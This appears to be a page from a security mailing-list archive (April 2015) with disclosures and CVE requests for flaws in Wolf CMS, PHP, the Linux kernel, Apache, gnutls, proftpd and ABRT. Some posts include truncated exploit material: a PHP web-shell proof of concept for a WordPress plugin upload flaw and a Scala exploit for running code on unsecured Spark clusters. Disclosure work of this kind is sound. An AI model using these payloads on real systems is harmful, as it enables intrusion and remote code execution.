Henri Salo | 19 Apr 08:45 2015

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability


Vendor response:

This is I believe works as designed. There is currently no limit on what a
user can upload.

As this is only possible for authenticated users, we are currently not
considering this a security issue.

If you feel differently, please elaborate why you consider this a security
issue. I guess we could add a strict upload mode.

Cheers, Martijn

Prathan Phongthiproek has requested CVE identifier for this issue.

Comments? Opinions?


Henri Salo

Larry W. Cashdollar | 18 Apr 15:06 2015

Exploit for VideoWhisper WP plugins file upload incomplete fix.

#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }

NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "				VideoWhisper Remote File Upload PoC Redux $NC";
echo "						4/14/2015";
echo "					   Larry W. Cashdollar,  <at> _larry0";
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "		     - Advisories -";
(Continue reading)

Eric Windisch | 17 Apr 17:44 2015

USERNS allows circumventing MNT_LOCKED

In October 2014, Andrey Vagin reported[1] to the Linux Containers list that
it would be possible to use user namespaces to circumvent MNT_LOCKED and
allow unprivileged users to access the directory structure underneath of
mounts. A PoC was also produced and is public.

Patches are now available and proposed to Linus[2].

This may not simply be information disclosure, but containerized
environments may through chroot and mount namespaces mask directory
structures as read-only or inaccessible via the use of bind-mounts. Such
read-only masking may be circumvented by this vulnerability on systems
where these directories are not otherwise protected by MAC (i.e. SELinux or

Eric Windisch

[1] https://groups.google.com/forum/#!topic/linux.kernel/HnegnbXk0Vs
[2] http://www.spinics.net/lists/linux-containers/msg30786.html
Marc Deslauriers | 17 Apr 11:06 2015

CVE Request: PHP potential remote code execution with apache 2.4 apache2handler


PHP 5.4.40, 5.5.24 and 5.6.8 fixed a potential remote code execution
vulnerability when used with the Apache 2.4 apache2handler.

https://bugs.php.net/bug.php?id=68486 (still private)

Fixed by:


Could a CVE please be assigned to this issue?



Emmanuel Law | 16 Apr 21:11 2015

[CVE Request] Multiple vulnerabilities in PHP's Phar handling

This serves as a cve request + advisory.

PHP has the built-in Phar & PharData functionality since 5.3.0. It allows
developers to use them to manipulate the following archive types: tar, zip,
phar. Serveral vulnerabilities were found in the Phar extenion.

[1: CVE Request]
There is a stack based buffer overflow when opening tar, zip or phar
archives through the Phar extension. An attacker and exploit this to run
arbitrary code.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69441

Please assign a CVE for this.

[2: Advisory for CVE-2015-2783]
When processing a specially crafted phar file, it is possible to trigger a
buffer over-read in PHP's unserialize function. An attacker can exploit
this to dump memory info leak on the system.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69324

(Continue reading)

Akhil Das | 16 Apr 20:19 2015

CVE Request: Arbitary Code Execution in Apache Spark Cluster

# *Vendor Homepage*: https://spark.apache.org/
# *Software Link*: https://spark.apache.org/downloads.html
# *Version*: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# *Tested on*: 1.2.1

# Reference(s) :
# Exploit URL  : https://github.com/akhld/spark-exploit/

# Spark clusters which are not secured with proper firewall can be taken
over easily (Since it does not have
# any authentication mechanism), this exploit simply runs arbitarty codes
over the cluster.
# All you have to do is, find a vulnerable Spark cluster (usually runs on
port 7077) add that host to your
# hosts list so that your system will recognize it (here its
spark-b-akhil-master pointing
# to in my /etc/hosts) and submit your Spark Job with arbitary
codes that you want to execute.

# Language: Scala

import org.apache.spark.{SparkContext, SparkConf}

 * Created by akhld on 23/3/15.

object Exploit {
  def main(arg: Array[String]) {
(Continue reading)

Florian Weimer | 16 Apr 14:42 2015

kernel: fs.suid_dumpable=2 privilege escalation

Should this be treated as a security vulnerability?

“fs: make dumpable=2 require fully qualified path”

Some widely-used cronie versions still do not have hardening and parse
commands in core dumps.


Florian Weimer / Red Hat Product Security

Martin Prpic | 16 Apr 10:08 2015

Potential CVE request: flaw in comment handling

Hi, we were notified of a flaw in the way Apache's mod_access_compat and
mod_authz_host handled comments in configuration files. When a comment
was defined on the same line that contained an "Allow" directive,
any potential IP ranges in that comment were also allowed to access
a resource.

This flaw was fixed in:


The docs do specify that comments are not allowed on the same line:

"There must be no other characters or white space between the backslash and the end of the line."

MITRE, does this qualify for a CVE?


$ sudo yum -y install httpd

$ echo hest123 | sudo tee /var/www/html/secret.txt

$ echo '<Location "/secret.txt">
> Order allow,deny
> Allow from # not 10
> </Location>' | sudo tee -a /etc/httpd/conf/httpd.conf
sudo service httpd restart

client on 10.x.x.x:
(Continue reading)

Jakub Filak | 15 Apr 11:45 2015

Re: Problems in automatic crash analysis frameworks


I have a question regarding the ABRT vulnerabilities. I don't particularly understand how an attacker can
use /proc/pid/exe symlink to force ABRT to read an arbitrary file if the symlink cannot be changed and
kernel refuses to create the process if the symlink's target is not executable.

> This code trusts the /proc/pid/exe symlink, even though it is possible
> to link it anywhere you want.
> https://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L368
>        sprintf(buf, "/proc/%lu/exe", (long)pid);
>        int src_fd_binary = open(buf, O_RDONLY); /* might fail and
>                                                    return -1, it's ok */

Thank you for clarifying this for me.

Kind regards,

Robert Święcki | 15 Apr 15:47 2015

double-free in gnutls (CRL distribution points parsing)

gnutls 3.3.14 fixes a double-free in parsing CRL distribution points.

It will affect applications which parse CRL distribution points or
print contents of certificates with gnutls-provided functions (e.g.

Usually a DoS under modern mem allocators, but creating something more
interesting using double-free exploitation techniques is not out of
the question



Robert Święcki

Hanno Böck | 15 Apr 02:39 2015

proftpd: Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

This sounds serious:

When the module mod_copy is enabled one can copy around files on the
server without any authentication.

(Not sure how widespread the use of this module is.)

There is no upstream release with a fix yet.


Hanno Böck

mail/jabber: hanno@...